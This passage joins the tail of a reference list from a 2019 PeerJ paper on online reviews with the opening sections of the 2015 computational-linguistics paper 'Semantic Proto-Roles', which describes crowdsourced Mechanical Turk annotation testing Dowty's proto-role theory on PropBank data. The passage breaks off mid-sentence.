10.1007/978-3-8349-6231-7_22. Papathanassis A, Buhalis D. 2007. Exploring the information and communication technologies revolution and visioning the future of tourism, travel and hospi- tality industries, 6th e-tourism futures forum: ICT revolutionising tourism 26– 27 2007, Guildford. International Journal of Tourism Research 9(5):385–387 DOI 10.1002/jtr.624. Papathanassis A, Knolle F. 2011. Exploring the adoption and processing of online holiday reviews: a grounded theory approach. Tourism Management 32(2):215–224 DOI 10.1016/j.tourman.2009.12.005. Price DJ. 1963. Little science, big science. New York: Columbia University Press DOI 10.7312/pric91844. Ramalingam D, Chinnaiah V. 2018. Fake profile detection techniques in large-scale online social networks: a systematic review. Computers and Electrical Engineering 65:165–177 DOI 10.1016/j.compeleceng.2017.05.020. Reyes-Menendez A, Saura J, Alvarez-Alonso C. 2018a. Understanding #WorldEnvironmentDay User Opinions in Twitter: a topic-based sentiment analysis approach. International Journal of Environmental Research and Public Health 15(11):2537–2555 DOI 10.3390/ijerph15112537. Reyes-Menendez A, Saura JR, Martinez-Navalon JG. 2019. The impact of e-WOM on hotels management reputation: exploring tripadvisor review credibility with the ELM model. IEEE Access 8(2) DOI 10.1109/ACCESS.2019.2919030. Reyes-Menendez A, Saura JR, Palos-Sánchez P. 2018b. Crowdfunding y financiación 2.0. Un estudio exploratorio sobre el turismo cultural. International Journal of Information Systems and Tourism 3(1):23–34. Reyes-Menendez A, Saura JR, Palos-Sanchez P, Alvarez JM. 2018. Understanding user behavioral intention to adopt a search engine that promotes sustainable water management. Symmetry 10(11):584–605 DOI 10.3390/sym10110584. Riegner C. 2007. Word of mouth on the web: the impact of web 2.0 on consumer purchase decisions. Journal of Advertising Research 47(4):436–447 DOI 10.2501/s0021849907070456. Saura JR, Bennett D. 2019. A three-stage methodological process of data text mining: a UGC business intelligence analysis. Symmetry-Basel DOI 10.13140/RG.2.2.11093.06880. Saura JR, Palos-Sanchez P, Reyes-Menendez A. 2017. Marketing a través de aplicaciones móviles de turismo (m-tourism). Un estudio exploratorio. International Journal of World of Tourism 4(8):45–56 DOI 10.12795/IJWT. Saura JR, Palos-Sánchez P, Suárez LM. 2017. Understanding the digital market- ing environment with kpis and web analytics. Future Internet 9(4):76–89 DOI 10.3390/fi9040076. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 20/21 https://peerj.com http://dx.doi.org/10.1016/j.eswa.2012.10.024 http://dx.doi.org/10.1007/978-3-8349-6231-7_22 http://dx.doi.org/10.1002/jtr.624 http://dx.doi.org/10.1016/j.tourman.2009.12.005 http://dx.doi.org/10.7312/pric91844 http://dx.doi.org/10.1016/j.compeleceng.2017.05.020 http://dx.doi.org/10.3390/ijerph15112537 http://dx.doi.org/10.1109/ACCESS.2019.2919030 http://dx.doi.org/10.3390/sym10110584 http://dx.doi.org/10.2501/s0021849907070456 http://dx.doi.org/10.13140/RG.2.2.11093.06880 http://dx.doi.org/10.12795/IJWT http://dx.doi.org/10.3390/fi9040076 http://dx.doi.org/10.7717/peerj-cs.219 Saura JR, Reyes-Menendez A, Alvarez-Alonso C. 2018a. Do online comments affect en- vironmental management? identifying factors related to environmental management and sustainability of hotels. Sustainability 10:3016–3036 DOI 10.3390/su10093016. Saura JR, Reyes-Menendez A, Palos-Sanchez P. 2018b. Un Analisis de Sentimiento en Twitter con Machine Learning: identificando el sentimiento sobre las ofertas de# BlackFriday. Revista Espacios 39:16–27. Saura JR, Rodriguez Herráez B, Reyes-Menendez A. 2019. Comparing a traditional approach for financial brand communication analysis with a big data analytics technique. IEEE Access 7(1):37100–37108 DOI 10.1109/ACCESS.2019.2905301. Shea BJ, Hamel C, Wells GA, Bouter LM, Kristjansson E, Grimshaw J, Boers M. 2009. AMSTAR is a reliable and valid measurement tool to assess the methodological quality of systematic reviews. Journal of Clinical Epidemiology 62(10):1013–1020 DOI 10.1016/j.jclinepi.2008.10.009. Sherman K, Cherkin DC, Erro J, Miglioretti DL, Deyo RA. 2005. Comparing yoga, exercise, and a self-care book for chronic low back pain: a randomized, controlled trial. Yearbook of Medicine 2006:32–35 DOI 10.1016/s0084-3873(08)70341-9. Shu K. 2019. Available at https://techcrunch.com/2019/02/26/ftc-brings-its-first-case- against-fake-paid-reviews-on-amazon (accessed on 28 March 2019). Van den Bosch M, Ode Sang A. 2017. Urban natural environments as nature based solutions for improved public health—a systematic review of reviews. Journal of Transport & Health 5:S79 DOI 10.1016/j.jth.2017.05.230. Vermeulen IE, Seegers D. 2009. Tried and tested: the impact of online hotel re- views on consumer consideration. Tourism Management 30(1):123–127 DOI 10.1016/j.tourman.2008.04.008. Walle AH. 1997. Quantitative versus qualitative tourism research. Annals of Tourism Research 24(3):524–536 DOI 10.1016/s0160-7383(96)00055-2. Xie H, Miao L, Kuo P, Lee B. 2011. Consumers’ responses to ambivalent online hotel reviews: the role of perceived source credibility and pre-decisional dis- position. International Journal of Hospitality Management 30(1):178–183 DOI 10.1016/j.ijhm.2010.04.008. Zhang D, Zhou L, Kehoe JL, Kilic IY. 2016. What online reviewer behaviors re- ally matter? effects of verbal and nonverbal behaviors on detection of fake online reviews. Journal of Management Information Systems 33(2):456–481 DOI 10.1080/07421222.2016.1205907. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 21/21 https://peerj.com http://dx.doi.org/10.3390/su10093016 http://dx.doi.org/10.1109/ACCESS.2019.2905301 http://dx.doi.org/10.1016/j.jclinepi.2008.10.009 http://dx.doi.org/10.1016/s0084-3873(08)70341-9 https://techcrunch.com/2019/02/26/ftc-brings-its-first-case-against-fake-paid-reviews-on-amazon https://techcrunch.com/2019/02/26/ftc-brings-its-first-case-against-fake-paid-reviews-on-amazon http://dx.doi.org/10.1016/j.jth.2017.05.230 http://dx.doi.org/10.1016/j.tourman.2008.04.008 http://dx.doi.org/10.1016/s0160-7383(96)00055-2 http://dx.doi.org/10.1016/j.ijhm.2010.04.008 http://dx.doi.org/10.1080/07421222.2016.1205907 http://dx.doi.org/10.7717/peerj-cs.219 work_dpi57lzqsnbf3mz6huezcw3zoy ---- Semantic Proto-Roles Drew Reisinger Rachel Rudinger Francis Ferraro Craig Harman Kyle Rawlins∗ Benjamin Van Durme∗ {rawlins@cogsci, vandurme@cs}.jhu.edu Johns Hopkins University Abstract We present the first large-scale, corpus based verification of Dowty’s seminal theory of proto-roles. Our results demonstrate both the need for and the feasibility of a property-based annotation scheme of semantic relationships, as opposed to the currently dominant notion of categorical roles. 1 Introduction For decades researchers have debated the number and character of thematic roles required for a theory of the syntax/semantics interface. AGENT and PA- TIENT are canonical examples, but questions emerge such as: should we have a distinct role for BENE- FICIARY? What about RECIPIENT? What are the boundaries between these roles? And so on. Dowty (1991), in a seminal article, responded to this debate by constructing the notion of a Proto- Agent and Proto-Patient, based on entailments that can be mapped to questions, such as: “Did the ar- gument change state?”, or “Did the argument have volitional involvement in the event?”. Dowty argued that these properties group together in the lexicon non-categorically, in a way that aligns with clas- sic Agent/Patient intuitions. For instance, a Proto- Patient often both changes state (but might not), and often is causally affected by another participant. Various resources have been developed for com- putational linguists working on ‘Semantic Role La- beling’ (SRL), largely under the classical, categor- ical notion of role. Here we revisit Dowty’s re- ∗Corresponding authors. search as computational linguists desiring data for a new task, Semantic Proto-Role Labeling (SPRL), in which existing coarse-grained categorical roles are replaced by scalar judgements of Dowty-inspired properties. As the availability of supporting data is a critical component of such a task, much of our ef- forts here are focused on showing that everyday En- glish speakers (untrained annotators) are able to an- swer basic questions about semantic relationships. In this work we consider the following questions: (i) can crowdsourcing methods be used to empiri- cally validate the formal linguistic theory of Dowty, following prior work in psycholinguistics (Kako, 2006b)? (ii) How might existing semantic anno- tation efforts be used in such a pursuit? (iii) Can the pursuit of Dowty’s semantic properties be turned into a practical and scalable annotation task? (iv) Do the results of such an annotation task (at various scales, including over very large corpora) continue to confirm Dowty’s proto- role hypothesis? And fi- nally, (v) how do the resulting configurations of fine- grained role properties compare to coarser annotated roles in resources such as VerbNet?1 We first derive a set of basic semantic ques- tions pertaining to Dowty-inspired properties. These questions are used in two Mechanical Turk HITs that address the above issuess. In the first HIT, we build on psycholinguistic work (Kako, 2006b) to directly access ‘type-level’ intuitions about a lexical item, by asking subjects property-questions using made-up (“nonce”) words in argument positions. Our results 1To be clear, Dowty himself does not make direct predic- tions about the distribution of proto-role properties within a cor- pus, except insofar as a corpus is representative of the lexicon. 475 Transactions of the Association for Computational Linguistics, vol. 3, pp. 475–488, 2015. Action Editor: Diana McCarthy. Submission batch: 3/2015; Revision batch 6/2015; Published 8/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. replicate these previous experiments, and demon- strate that what can be done in this domain in a controlled lab experiment can be done via crowd- sourcing. We extend this to a large-scale MTurk an- notation task using corpus data. This task presents an annotator with a particular (‘token-level’) sen- tence from PropBank (Palmer et al., 2005) and a highlighted argument, and asks them for a likelihood judgment about a property; for example, “How likely or unlikely is it that ARG is sentient?”. By looking across many token-level instances of a verb, we can then infer type-level information about the verb. We discuss results from this task over 11 role properties annotated by a single (trusted) annota- tor on approximately 5000 verb tokens. Our results represent the first large-scale corpus study explicitly aimed at confirming Dowty’s proto-role hypothesis: Proto-Agent properties predict the mapping of se- mantic arguments to subject and object. We show that this allows us to both capture and discover fine- grained details of semantic roles that coarser anno- tation schemes such as VerbNet do not: empirically, this data set shows a great degree of role fragmen- tation, much greater than any existing annotation scheme allows. The results of this task represent a new large-scale annotated resource, involving close to 345 hours of human effort.2 2 Background 2.1 Roles in linguistics Thematic roles have been a key analytical compo- nent in modern linguistic theory.3 Despite the vast literature, there is surprisingly little consensus over what a thematic role is, or how to identify or pre- cisely characterize them. A ‘textbook’ approach, in- fluential in linguistics and computer science, is that there is a (short) list of core Generalized Thematic Roles, such as AGENT, PATIENT, EXPERIENCER, 2Available through the JHU Decompositional Semantics Ini- tiative (Decomp): http://decomp.net . 3A full accounting of the history of thematic roles is be- yond the scope available here (Blake, 1930; Gruber, 1965; Fill- more, 1966; 1976; 1982; Castañeda, 1967; Jackendoff, 1972; 1987; Cruse, 1973; Talmy, 1978; Chomsky, 1981; Carlson, 1984; Carlson and Tanenhaus, 1988; Rappaport and Levin, 1988; Rappaport Hovav and Levin, 1998; Levin and Rappaport Hovav, 2005; Dowty, 1989; 1991; Parsons, 1990; Croft, 1991; Davis and Koenig, 2000, among others). etc. that verbs assign to arguments. However, it has been known for some time that this view is prob- lematic (see Levin and Rappaport Hovav (2005) for an overview). Perhaps the best known arguments emerge from the work of David Dowty. Proto-roles Dowty (1991), in an exhaustive sur- vey of research on thematic roles up to that point, identifies a number of problems with generalized thematic roles. First and foremost, if the inven- tory of role types is small, then it proves impos- sible to clearly delineate the boundaries between role types. This situation pushes researchers who want clean role boundaries towards a very large in- ventory of specialized, fine-grained thematic roles – what Dowty termed role fragmentation. A large, fragmented set of role-types may be useful for many purposes, but not for expressing generaliza- tions that should be stated in terms of thematic roles. Dowty (1991) focuses on generalizations related to the mapping problem: how are syntactic arguments mapped to semantic arguments? The mapping prob- lem is not just a linguistic puzzle, but a central prob- lem for tasks such as SRL, semantic parsing, etc. Dowty offers a solution to the mapping problem couched not in terms of fine-grained fragmented thematic roles, but in terms of what Dowty analo- gizes to ‘prototype’ concepts constructed over fine- grained role properties. In particular, the role- properties are features such as whether the partic- ipant in question causes the event to happen, or whether the participant changes state. Dowty groups properties into two classes: Proto-Agent properties, and Proto-Patient properties. A semantic argument is more AGENT-like the more Proto-Agent proper- ties it has, and more PATIENT-like the more Proto- Patient properties it has. These two sets of properties are in competition, and an argument can have some of each, or even none of the properties. Dowty’s role properties (slightly modified) are shown in Table 1; we use these as a starting point for our own choice of fine-grained features in §3.4 Classic role types fall out from what we will 4Dowty’s Argument Selection Principle: “In predicates with grammatical subject and object, the argument for which the predicate entails the greatest number of Proto-Agent properties will be lexicalized as the subject of the predicate; the argument having the greatest number of Proto-Patient entailments will be lexicalized as the direct object.” (Dowty 1991:31) 476 Proto-Agent properties Proto-Patient properties a. volitional involvement f. changes state b. sentience (/perception) g. incremental theme c. causes change of state h. causally affected d. movement (relative) i. stationary (relative) e. independent existence j. no indep. existence Table 1: Proto-role properties (Dowty 1991:27–28). term configurations of these properties. A ‘core’ AGENT, for example, would have all of the Proto- Agent properties. An EXPERIENCER would have Proto-Agent properties (b) and (e), and Proto-Patient property (h), and so would be less AGENT-like than a core AGENT. This idea is further developed by Grimm (2005; 2011), who points out that when combinations of proto-role properties are looked at as a lattice structure, generalized thematic roles can be identified with particular parts of the lattice. If Dowty’s proposal is right, the lexicon will instanti- ate a very large number of property configurations, rather than a small and constrained set. A key result of this theory is explanation of the contrast between what Dowty terms stable and un- stable predicates. A stable predicate is one like kill whose mapping behavior is similar across languages – the KILLER is mapped to subject, and the VIC- TIM to object. An unstable predicate is one where this is not so. Instability can also manifest within a language, in the form of lexical doublets such as buy and sell. The Proto-Patient argument for these verbs is stable, but the subject alternates: for buy it is the GOAL argument that appears as subject while for sell it is the SOURCE. Dowty’s explanation is that for transaction events, SOURCE and GOAL are very similar in their Proto-Agent properties, and so compete equally for subject position. Dowty’s linguistic proposal, if correct, has sub- stantial implications for human language technol- ogy (see also discussion in Palmer et al. (2005)). It suggests an approach to semantic annotation, se- mantic parsing, and related tasks that focuses on this fine-grained level of proto-role properties, with any more generalized thematic roles as emergent property configurations. If lexical argument struc- ture is organized around proto-roles, then we predict that we will find this organization reflected in cor- pora, and that token-level annotations of verb mean- ings would benefit from observing this organiza- Proto−Agent Proto−Patient stationary changed created moved existed chose caused do caused change aware −6 −3 0 3 6 Mean difference (subject − object) Figure 1: Proto-role properties in Kako 2006 exp. 1 (re- production of Kako’s Fig. 1). Error bars in all figures show 95% t-test CIs. tion. In particular, an annotation strategy that takes the proto-role hypothesis seriously would annotate verbs for properties such those shown in Table 1. Experimental work Can the proto-role hypothe- sis be operationalized? A starting point is experi- mental work by Kako (2006a,b), who took the proto- role hypothesis into the lab. Kako developed several experimental versions of the hypothesis, whereby participants were asked simplified question-based versions of Dowty’s proto-role properties about sen- tences of English. Kako did not use actual or attested sentences of English, but rather focused on ‘nonce’- based tasks. That is, he constructed stimuli by taking constructed sentences of English containing the tar- get verbs, and replacing noun positions with nonce words like dax. Subjects were then presented with these nonce sentences and asked questions such as, “How likely is it that the dax moved?”. The nonce-method is designed to access ‘type- level’ judgments about verbs across frames. Across all experiments, Kako confirms a version of the proto-role hypothesis: subject arguments across the verbs he examines have significantly more Proto- Agent than Proto-Patient properties, and vice versa for objects. Fine-grained results for individual proto-role properties from one of his experiments are shown in Figure 1: this presents an aggregate measure of the success of the proto-role hypothesis, showing the mean difference between property rat- ings for subject vs. object arguments. Dowty’s map- ping hypothesis predicts that subjects should skew towards Proto-Agent properties, and objects towards 477 Proto-Patient properties, exactly Kako’s finding. Kako’s work help lead Alishahi and Stevenson (2010) to annotate a small collection of child di- rected speech with Dowty-inspired properties, used to evaluate a Bayesian model for inducing what they termed semantic profiles.5 2.2 Roles in computational linguistics PropBank6 PropBank (Palmer et al., 2005) lay- ers predicate/argument annotations on the English portion of the Penn Treebank (PTB) (Marcus et al., 1993), treating semantic role annotation as a sort of slot-filling exercise: a frameset defines a set of se- mantic roles that a particular type of predicate may use. Every verb is assigned a frameset (roughly, a verb sense), and arguments of the verb (potentially a non-contiguous span) are labeled with a particu- lar role. Coarse categorical labels, such as ARG0 and ARG1, allow PropBank to both capture some of Levin (1993)’s syntactic variations, and imbue this syntactic information with shallow semantics. An- notations do not cross sentence boundaries. As every verb in the PTB was annotated, Prop- Bank has good coverage: 4,500 framesets cover around 3,300 verb types. Additional resources have adopted and extended PropBank, e.g. (Weischedel et al., 2013, etc.), and there have been multiple shared tasks centered around PropBank-style SRL (Carreras and Màrquez, 2005). However, at three days (Palmer et al., 2005), the training time for an annotator is significantly higher than the crowd- sourcing solution we pursue here. VerbNet and SemLink VerbNet (Schuler, 2005) provides a class-based view of verbs. It applies Levin’s verb classes (Levin, 1993) to more than five thousand (English) verbs, categorizing them accord- 5Probability distributions over observed configurations that capture a generalized notion of semantic (proto-)role. 6This section is not a fully exhaustive list of resources, and we omit discussion of several important ones that are comple- mentary to our efforts. For example, resources such as the Pattern Dictionary of English Verbs (Hanks, 2013), currently in progress, could be supplemented by our SPRL annotations. (The PDEV will contain valency patterns for thousands of verbs along with restrictions on the semantic types of their arguments based on (Pustejovsky et al., 2004)’s ontology.) Also important is early connectionist work, which proposed “semantic micro- features” to model semantic role generalizations; see e.g. Hin- ton (1981; 1986) and McClelland and Kawamoto (1986). ing to their syntactic behaviors. Beyond this group- ing, which includes a shallow semantic parse frame, VerbNet provides its own semantic role labels, and a neo-Davidsonian-inspired logical form. All infor- mation within VerbNet is class-specific; the frames and roles apply equally to all verbs within a class.7 Further, VerbNet’s lexical entries allow for assign- ing selectional restrictions on thematic roles, e.g. re- quiring a participant be CONCRETE, or ANIMATE. While these restrictions take the form of properties, the thematic roles themselves are left categorical. Bonial et al. (2011) united VerbNet’s semantic roles with those of LIRICS8, a standardization ef- fort to facilitate multilingual NLP. Motivated in part by the properties of Dowty, they constructed a hi- erarchy of 35 roles interrelated through their prop- erty requirements, implicit in the organization of the hierarchy paired with natural language role defini- tions. The properties bundled into these roles are then taken taken to be type-level, hard constraints: they cannot reflect semantic nuances within individ- ual sentences, and are strictly boolean (a property cannot hold to a degree, or with some uncertainty). The SemLink project (Loper et al., 2007) provides a mapping between VerbNet, PropBank, FrameNet (see below) and WordNet (Fellbaum, 1998). Cru- cially for our work (see §6), SemLink provides a mapping from the role hierarchy of Bonial et al. (2011) to the argument annotations of PropBank. VerbCorner VerbCorner (Hartstone et al., 2013; Hartshorne et al., 2014) is an on-going effort to val- idate VerbNet’s semantic annotations, focusing at a finer-grained level of role information. For a partic- ular verb and semantic features, annotators are pro- vided context through a small, made-up story. An- notators then read example sentences pulled from VerbNet and determine whether those sentences vi- olate the contextual expectations. As with the present work, VerbCorner crowd-sources the anno- 7 For instance, the lemmas break and shatter are both mem- bers of the same class (BREAK-45.1), capturing the causative alternation. Both senses can be used transitively (“John broke/shattered the mirror”) or intransitively (“The mirror broke/shattered.”), while semantic roles assign John to AGENT and the mirror to PATIENT in both syntactic frames, capturing the logical entailment of a resulting degraded physical form. 8Linguistic InfRastructure for Interoperable ResourCes and Systems (LIRICS): http://lirics.loria.fr/ 478 tation, though there are key differences: Hartstone et al. (2013) are focused on logical entailments (what must be true) whereas we are focused on strongly suggested implications (what is likely to be true). FrameNet The Berkeley FrameNet Project (Baker et al., 1998) is an instantiation of Fillmore’s frame semantic theory (Fillmore, 1982). FrameNet de- scribes events via a frame, consisting of lexical triggers and semantic roles that are expected to be filled. This is similar to PropBank’s take on predi- cate/argument structure, though there are significant differences: (1) FrameNet triggers may be mul- tiword, verbal or nominal expressions; (2) unlike PropBank, FrameNet defines interframe relations; (3) FrameNet is extremely fine-grained (embraces role-fragmentation), opting for semantic complete- ness rather than annotator ease. FrameNet has in- spired semantic role labeling (Gildea and Jurafsky, 2002; Litkowski, 2004), in addition to frame seman- tic parsing (Baker et al., 2007; Das et al., 2010). 3 Experimental Setup The literature review makes clear that understanding and annotating fine-grained role properties is valu- able in both linguistic theory and in computational linguistics: under many sets of assumptions, such properties ground out the theory of coarse-grained roles. We follow Hartstone et al. (2013) in directly addressing fine-grained properties, here in the con- text of the proto-role theory. The proto-role ap- proach gives us a set of testable questions to as- sess on a corpus. We focus on two main issues: (i) whether the proto-role solution to the mapping prob- lem scales up to very large sets of data, and (ii) the prediction that there will be a very large set of prop- erty configurations attested as roles in a large data set. If the predictions from the proto-role theory are true, then we conclude that a large data set annotated with fine-grained role properties may be valuable in tasks related to semantic roles and event detection. To assess these predictions, we broadly follow Kako (2006b) in operationalizing proto-roles using likelihood questions targeting specific role proper- ties in sentences of English. This paper presents two experiments that implement this strategy. In the re- mainder of this section we describe the general setup of the experiments. In particular, we describe a pro- Role property Q: How likely or unlikely is it that... instigated Arg caused the Pred to happen? volitional Arg chose to be involved in the Pred? awareness Arg was/were aware of being involved in the Pred? sentient Arg was sentient? moved Arg changes location during the Pred? phys existed Arg existed as a physical object? existed before Arg existed before the Pred began? existed during Arg existed during the Pred? existed after Arg existed after the Pred stopped? changed poss Arg changed possession during the Pred? changed state The Arg was/were altered or somehow changed during or by the end of the Pred? stationary Arg was stationary during the Pred? Table 2: Questions posed to annotators. cess for arriving at the specific fine-grained property questions we ask, the creation of the data set that we ask the questions about, the task that Mechanical Turkers are presented with, and the manner in which we analyze and display the results. We first inspected the role hierarchy of Bonial et al. (2011) along with the associated textual defini- tions: these were manually decomposed into a set of explict binary properties. For example, we define the SemLink ACTOR role as a participant that has the binary property of INSTIGATION. From these properties we subselected those that were most sim- ilar to the original questions proposed by Dowty (see Table 1). For each such property we then generated a question in natural language to be posed to anno- tators given an example sentence (see Table 2). The set we report on here represents a subset of the ques- tions we have tested; in ongoing work we are eval- uating whether we can expand Dowty’s set of ques- tions, e.g. to capture roles such as INSTRUMENT. Methods Because we are interested in the poten- tial impact of Dowty’s proto-roles theory on human language technologies, we perform a number of re- lated crowdsourcing experiments, with the dual aim of validating the existing (psycho-)linguistic litera- ture on proto-roles as well as piloting this highly scalable framework for future decompositional se- mantic annotation efforts. All of the crowdsourcing experiments in this pa- per are run using Amazon Mechanical Turk, and (ex- 479 cept for the kappa scores reported for experiment 2) all workers were recruited from the MTurk worker pool. The basic setup of the experiments in Sec- tions 4 and 5 is the same. The Mechanical Turk worker is presented with a single sentence with a highlighted verb and one highlighted argument of that verb. Then the worker answers all of the ques- tions in Table 2 for that verb-argument pair using a Likert scale from 1 to 5, with the response labels: very unlikely, somewhat unlikely, not enough infor- mation, somewhat likely, and very likely (See Figure 2). Each Mechanical Turk HIT yields responses for all the questions in Table 2 applied to a single verb- argument pair. The Mechanical Turk experiments are run with two types of sentences: those with real verbs and nonsense (“nonce”) arguments, and those with entirely real English sentences. Section 4 dis- cusses the former “type-level” HIT with nonce argu- ments, while Section 5 discusses the latter “token- level” annotation task with real arguments. Figure 2: Example HIT question with nonce arguments. Data To obtain verb-argument pairs for the task described here, we drew sentences from the subset of PropBank that SemLink annotates for VerbNet roles. From these, we removed verbs annotated as participles, verbs with trace arguments, verbs under negation or modal auxiliaries, and verbs in embed- ded clauses to ensure that annotators only saw verbs in veridical contexts – contexts where logical op- erations such as negation do not interfere with di- rect judgments about the verbs. For example, in John didn’t die, negation reverses the change-of- state judgment for the whole sentence, despite that being part of the meaning of the verb die. We also re- moved clausal arguments, as most of the questions in Table 2 do not make sense when applied to clauses; in ongoing work we are considering how to extend this approach to such arguments. A total of 7,045 verb tokens with 11,913 argument spans from 6,808 sentences remained after applying these filters. Analysis To evaluate whether the results of the following experiments accord with Dowty’s pro- posal, we follow Kako (2006b) in taking the mean difference between the property ratings of the sub- ject and object across sentences; see §2.1. We present these differences in the same format as in Figure 1. Here we stick with Kako’s evaluation of the results, in order to demonstrate the convergence of the linguistic and psycholinguistic evidence with computational linguistic approaches; our immedi- ate goal in the present work is not to advance the methodology, but to show that these techniques can be pursued through large-scale crowdsourcing. We perform two Mechanical Turk experiments on verbs: one with nonce arguments, and one with real data in Section 5. Because nonce arguments have no meaning in their own right, we assume that the properties that annotators assign these arguments are a function of the verb and role, not the argument it- self. Hence, we assume that these annotations are at the verb-role type level. Conversely, the experi- ment in Section 5 are at the token level, because all arguments have real English instantiations. 4 Experiment 1: Nonce-based The first experiment we run with nonce arguments is an attempt to replicate the results of Kako (2006b). Recall that Kako (2006b) upholds the psychological validity of Dowty (1991)’s Argument Selection Prin- ciple, by demonstrating that human subjects assign Proto-Agent and Proto-Patient properties to gram- matical subject and object arguments according to Dowty’s prediction. (See Figure 1.) In this experiment, we generate simple transitive sentences with a small set of real verbs and nonce arguments. The set of verbs are precisely those se- lected by Kako (2006b) in his first experiment: add, deny, discover, finish, find, help, maintain, mention, pass, remove, show, write. The questions we ask workers to answer come from a slightly expanded set of proto-role properties.9 There were 16 partic- 9As pointed out by a reviewer, a verb in a nonce sentence is potentially ambiguous. Because we constructed the nonce sentences from actual frames in PropBank examples, an anno- tator will have at least coarse cues to the intended sense. In this respect we follow Kako, and established protocol in nonce ex- periments in general. We leave the effect of sense ambiguity on nonce property judgments for future work. 480 ipants in the experiment, recruited from the MTurk worker pool, each completing 7.5 HITs on average. The results of this experiment, broadly, repli- cate Kako (2006b)’s earlier findings: human anno- tators on average indicate that, within the same sen- tence, the subject-position argument is more likely to have Proto-Agent properties than the object- position argument, and the object-position argument is more likely to have Proto-Patient properties than the subject-position argument. This finding is illus- trated in Figure 3. In addition, the basic facts match Kako’s original finding; compare Figures 3 and 1. (Our INSTIGATION property is equivalent to Kako’s CAUSED CHANGE property, and we do not have an analogue of his CAUSED DO property.) Proto- Agent properties have a greater effect than Proto- Patient properties, and CAUSATION, VOLITION, and AWARENESS are all strong Proto-Agent properties. CREATION and STATIONARY are all weaker, but non-zero, Proto-Patient properties for these verbs. There are some differences that are apparent. First of all, where Kako did not (in this particular experi- ment) find an effect of CHANGE OF STATE, we did; this is broadly consistent with Kako’s overall find- ings. We did not get an effect for MOVEMENT or for PHYSICAL EXISTENCE in this experiment, in con- trast to Kako’s results. Proto−Agent Proto−Patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated −2 −1 0 1 2 Mean difference (subject − object) Figure 3: Mechanical Turk results for the nonce exper- iment. A positive value for a property indicates that, on average, subject-position arguments received a higher score for that property than object-position arguments. Our ability to replicate Kako (2006b) is signifi- cant for two reason: (i) it lends further credence to the proto-role hypothesis, and (ii) it establishes that crowd-sourcing with non-experts in a less controlled situation than a formal experiment results in reason- able annotations for this task with minimal training. 5 Experiment 2: Corpus-based Can this result extend to real corpus data? If so, the proto-role theory can lead to a valuable source of annotation information about thematic roles. To as- sess this, we moved from a synthetic nonce task to a much larger scale version of the task using data from PropBank (Palmer et al., 2005). Each item in this task presents the annotator with a PropBank sen- tence with the predicate and argument highlighted, and asks them the same questions about that actual sentence. The sentences were sampled from Prop- Bank as described in §3. Our primary goal in this collection effort was to obtain internally consistent, broad-coverage annota- tions. Thus we worked through a number of pilot annotation efforts to determine cross-annotator reli- ability between annotators and with our own judge- ments. From the final version of our pilot10 we se- lected a single annotator with strong-pairwise agree- ment amongst the other most prolific annotators. Compared to the five other most prolific annota- tors in our final pilot, the pair-wise average Cohen’s Kappa with squared metric on an ordinal interpreta- tion of the Likert scale was 0.576.11 In our large-scale annotation task, we have col- lected property judgments on over 9,000 arguments of near 5,000 verb tokens, spanning 1,610 PropBank rolesets. This represents close to 350 hours of anno- tation effort. The results are shown in Figure 4. Be- cause some arguments in PropBank are abstract, for which many of the questions in Table 2 do not make sense, we added an additional response field that asks “Does this question make sense” if the worker gives a response lower than 3 (Figure 6). Figure 5 shows the results with N/A responses removed. For presentation purposes, we convert the temporal exis- tence properties to CREATION and DESTRUCTION. Discussion The overall results substantially re- semble both Kako’s original results and our experi- 10Based on a set of 10 verbs selected based on frequency in the CHILDES corpus, filtering for verbs that had enough to- kens in PropBank; want.01, put.01, think.01, see.01, know.01, look.02, say.01, take.01, tell.01, and give.01. 11One of those five annotators had less stable judgements than the rest, which we identified based on a pair-wise Kappa score of only 0.383 with our final annotator. If removing that annotator the average pair-wise score with the remaining four annotators then rose to 0.625. 481 Proto−Agent Proto−Patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated −4 −2 0 2 4 Mean difference (subject − object) Figure 4: Mechanical Turk results for experiment 2. Proto−Agent Proto−Patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated −4 −2 0 2 4 Mean difference (subject − object) Figure 5: Experiment 2 with N/A removed. Figure 6: An additional response field appears for ques- tions that might not be applicable. (Example sentence for this question: “The antibody then kills the cell.”) ment 1.As predicted, the Proto-Agent properties are predictors of whether an argument will be mapped to subject position, and the Proto-Patient proper- ties similarly predict objecthood. Not all proper- ties are equal, and on this much larger data set we can clearly see that INSTIGATION (causation) is the strongest property. Because we have many data points and a reliable annotator, the variance on this data is much smaller. This graph confirms the the proto-role hypothesis over a large corpus: fine- grained role properties predict the mapping of se- mantic roles to argument position. This data set puts us in a position to ask a wide range of followup questions about the nature of thematic roles, many of which we cannot adddress in the present paper. The central question we do address here is about property configurations: since each property con- Example Rtg (A) He earned a master’s degree in architecture from Yale. N/A (B) The bridge normally carries 250,000 commuters a day. 1 (C) Baskets of roses and potted palms adorned his bench. 5 Table 3: STATIONARY examples from experiment 2. figuration represents a coarse-grained role, we can ask what the distribution of property configurations is over this corpus. Dowty’s prediction is that we should see some clustering around common config- urations, but a long tail representing role fragmenta- tion. The prediction of classical approaches is that we should see only the common configurations as clusters, with no long tail. We turn to this issue in the following sections, comparing our role annota- tions also to roles in VerbNet and FrameNet (using SemLink as the mapping among the three data sets). One key difference from Dowty’s predictions is that STATIONARY appears to act as a Proto-Agent property. First, we are using a slightly different no- tion of stationary to Dowty, who proposed that it be relative to the event – in this we follow Kako. Second, our MOVEMENT property is really about change of location (see Table 2) and so is not the negation of STATIONARY. Third, our corpus is heav- ily biased to non-physical events and states, where the notion of motion does not apply, and so in this respect may not be fully representative of a more naturalistic corpus. Within the relatively small pro- portion of data that is left, we find that objects do not tend to be stationary, and so if this is correct, it may simply be wrong to classify the absolute version of STATIONARY as a Proto-Patient property. Three ex- amples from the data set are shown Table 3, for each case – the result is that once N/A responses are ex- cluded, examples such as (B) are still more the norm than examples such (C). Annotation quality To assess annotation quality we began with a stratified sample based on each PropBank argument ID in the set {0, 1, 2, 3, 4, 5}.12 Local researchers each then answered 209 questions over this sample. One of the authors participated, 12While argument IDs are meant to be meaningful when con- ditioned on a roleset, the values still correlate with the “core- ness” of an argument even when independent of roleset (e.g., 